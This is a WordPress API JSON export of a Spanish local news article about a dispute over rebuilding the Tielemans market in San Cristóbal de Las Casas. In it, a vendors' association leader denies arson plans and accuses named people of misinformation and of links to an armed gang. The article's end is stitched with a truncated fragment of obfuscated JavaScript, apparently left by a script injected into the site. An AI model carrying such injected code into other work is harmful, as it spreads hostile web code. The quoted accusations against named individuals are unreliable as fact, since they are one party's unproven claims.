{"id":749,"date":"2022-03-19T05:37:34","date_gmt":"2022-03-19T05:37:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=749"},"modified":"2022-03-19T05:37:35","modified_gmt":"2022-03-19T05:37:35","slug":"almetrach-se-deslinda-de-actos-violentos-en-el-mercado-tielemans","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=749","title":{"rendered":"Almetrach se deslinda de actos violentos en el mercado Tielemans"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-18-at-9.35.22-AM-1024x768.jpeg\" alt=\"\" class=\"wp-image-750\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-18-at-9.35.22-AM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-18-at-9.35.22-AM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-18-at-9.35.22-AM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-18-at-9.35.22-AM.jpeg 1408w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Lo<\/figcaption><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>18 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Narciso Ruiz S\u00e1ntiz, l\u00edder de la Asociaci\u00f3n de Locatarios de Mercados Tradicionales de Chiapas (Almetrach), neg\u00f3 que tenga la intenci\u00f3n de incendiar el mercado p\u00fablico municipal &#8220;Jos\u00e9 Castillo Ti\u00e9lemans&#8221; y tampoco su agrupaci\u00f3n ha aprobado la reconstrucci\u00f3n de este centro de abasto y se\u00f1al\u00f3 a los supuestos responsables de los disturbios suscitados el pasado martes 15 de marzo. Acompa\u00f1ado de unos 100 integrantes de Almetrach, ofreci\u00f3 una conferencia de prensa donde dijo que todo el conflicto surgi\u00f3 por la mala informaci\u00f3n que se dio sobre la construcci\u00f3n del mercado, pero consider\u00f3 que es necesario por seguridad, y como organizaci\u00f3n se encuentran de acuerdo, sin embargo tienen que estar de acuerdo todos. &#8220;Pero la mala informaci\u00f3n por parte de Manuel D\u00edaz P\u00e9rez y Miguel G\u00f3mez Ruiz han hecho que los locatarios tengan temor de que una vez tirado el mercado ya no van a poder regresar y van a perder sus locales, pero es mentira ya que la Sedatu ya tiene contabilizado el n\u00famero de locales y se van a entregar los mismos&#8221;. Asimismo, coment\u00f3 que con la obra se va a realizar mejoras en la luz y desag\u00fces, por lo que Almetrach se ha encargado de que los locatarios conozcan el proyecto de verdad, &#8220;sin embargo estas personas ya se cerraron al di\u00e1logo, se formaron como grupo de locatarios independientes junto con Renata Solorzano y Enrique D\u00edaz S\u00e1ntiz y contrataron a un grupo criminal llamado los Vans que encabeza Eleazar D\u00edaz P\u00e9rez alias el Black&#8221;. &#8220;Est\u00e1 unido con Pablo  P\u00e9rez S\u00e1ntiz del Pinar, Juan de la comunidad Yitic del municipio de Chamula due\u00f1o del bar Dubai, y ahora ese grupo criminal, es el que est\u00e1 en  posesi\u00f3n del mercado presionando a los locatarios a que se deslinden de la Almetrach y se unan a ellos y es obvio que por salvaguardar su vida y sus locales est\u00e1n aceptando, estas mismas personas son las que llegaron el pasado martes 15 de marzo armados fuertemente al mercado Jos\u00e9 Castillo Tielemans realizando disparos&#8221;. Finalmente, advirti\u00f3 que proceder\u00e1 legalmente con denuncias penales en contra de quienes se encuentran en el Mercado y neg\u00f3 haber recibido dinero por aprobar la reconstrucci\u00f3n del mercado, por lo que pidi\u00f3 le muestren las pruebas que tengan en donde \u00e9l ha recibido dinero por el proyecto<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Lo \u00d3scar G\u00f3mez 18 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Narciso Ruiz S\u00e1ntiz, l\u00edder de la Asociaci\u00f3n de Locatarios de Mercados Tradicionales de Chiapas (Almetrach), neg\u00f3 que tenga la intenci\u00f3n de incendiar el mercado p\u00fablico municipal &#8220;Jos\u00e9 Castillo Ti\u00e9lemans&#8221; y tampoco su agrupaci\u00f3n ha aprobado la reconstrucci\u00f3n de este centro de abasto &hellip;<\/p>\n","protected":false},"author":2,"featured_media":750,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-749","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/749","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=749"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/749\/revisions"}],"predecessor-version":[{"id":751,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/749\/revisions\/751"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/750"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=749"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=749"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=749"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}